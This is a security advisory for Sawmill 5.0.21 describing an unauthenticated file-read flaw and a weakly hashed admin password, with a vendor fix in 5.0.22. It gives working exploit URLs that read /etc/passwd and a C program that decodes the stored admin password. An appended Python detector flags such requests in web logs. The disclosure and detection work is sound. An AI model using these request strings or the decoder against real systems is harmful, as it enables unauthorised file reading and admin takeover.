Vulnerability
sawmill
Affected
Sawmill 5.0.21
Description
Larry Cashdollar found the following. SawMill is a site log
statistics package for UNIX, Windows and MacOS. Testing was done
under Linux. In the test configuration Sawmill listened on port
8987 on the web server. Two things stand out.
1) You can get Sawmill to read you the first line of any
world-readable file (if it is run as nobody) without needing to
authenticate first. The following will print the first line of
/etc/passwd:
http://192.168.1.65:8987/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
You can imagine how much more fun this would be if it was
launched as root, which it should not be and does not need to be.
2) The password is stored with a weak hash algorithm (a fixed
per-character substitution) and can be decrypted using the C
program below. This is dangerous because the previous security
hole allows you to read the first line of
sawmill/SawmillInfo/SawmillPassword, decrypt the password, access
the site statistics and reconfigure Sawmill, along with browsing
the remote machine's drive contents. If Sawmill is run as root,
the attacker can specify files readable only by root as log files
and read most if not all of their contents.
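/* Decrypt password for Sawmill admin account.
   Larry W. Cashdollar
   lwc@vapid.betteros.org
   http://vapid.betteros.org
   usage: ./decrypt cyphertext
*/
#include <stdio.h>
#include <string.h>

/* Substitution table: encode[i] in the stored password stands for alpha[i]. */
char *alpha = "abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()_+~<>?:\"{}|";
char *encode = "=GeKMNQS~TfUVWXY[abcygimrs\"#$&-]FLq4.@wICH2!oEn}Z%(Ovt{z";

int
main (int argc, char **argv)
{
  size_t x, y;
  char cypher[128];

  if (argc != 2)
    {
      fprintf (stderr, "usage: %s cyphertext\n", argv[0]);
      return 1;
    }
  /* strncpy does not terminate on truncation, so terminate explicitly. */
  strncpy (cypher, argv[1], sizeof (cypher) - 1);
  cypher[sizeof (cypher) - 1] = '\0';

  /* Map each stored character back through the table. */
  for (x = 0; x < strlen (cypher); x++)
    {
      for (y = 0; y < strlen (encode); y++)
        if (cypher[x] == encode[y])
          printf ("%c", alpha[y]);
    }
  printf ("\n\"+\" could also be a space [ ]\n");
  return 0;
}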
Sawmill can also be run as a CGI script. This method is
vulnerable as well. The following will print the first line of
the password file:
http://www.example.com/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
Solution
Sawmill issued a new version of Flowerfire Sawmill (5.0.22) which
corrects both of the vulnerabilities mentioned above. The update
is free.
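
The unauthenticated file-read request described above leaves a recognisable query string in web access logs. The following is an added example, not part of the original advisory or of Sawmill: a Python check that flags such requests, assuming the server or front-end logs in Apache/NCSA combined format; the function name, result fields and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Assumption: requests are logged in Apache/NCSA combined format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"[A-Z]+ (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# After URL-decoding, the advisory's request reads: rfcf "<file>" spbn ...
RFCF_RE = re.compile(r'(?:^|\s)rfcf\s+(?:"(?P<quoted>[^"]*)"|(?P<bare>\S+))')

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2001:10:00:01 +0000] "GET /sawmill HTTP/1.0" 200 2048
198.51.100.7 - - [01/Jan/2001:10:02:13 +0000] "GET /sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3 HTTP/1.0" 200 512
198.51.100.7 - - [01/Jan/2001:10:02:40 +0000] "GET /cgi-bin/sawmill5?rfcf+%22sawmill/SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1 HTTP/1.0" 200 64
192.0.2.10 - - [01/Jan/2001:10:05:00 +0000] "GET /index.html?rfcf+test HTTP/1.0" 404 0
this line is not in log format and is skipped
"""


def find_rfcf_reads(log_text):
    """Return one finding per Sawmill request that names a file via rfcf."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-HTTP line
        path, _, query = m.group("target").partition("?")
        if "sawmill" not in path.lower():
            continue  # only the Sawmill server/CGI endpoints are of interest
        hit = RFCF_RE.search(unquote_plus(query))
        if not hit:
            continue
        name = hit.group("quoted") if hit.group("quoted") is not None else hit.group("bare")
        findings.append({
            "ip": m.group("ip"),
            "time": m.group("ts"),
            "status": int(m.group("status")),
            "file": name,
            # A read of the password file precedes the admin login the advisory describes.
            "password_file": "SawmillPassword" in name,
        })
    return findings


if __name__ == "__main__":
    for f in find_rfcf_reads(SAMPLE_LOG):
        print(f)
```

A finding with password_file set means the stored admin password should be treated as disclosed and changed after upgrading.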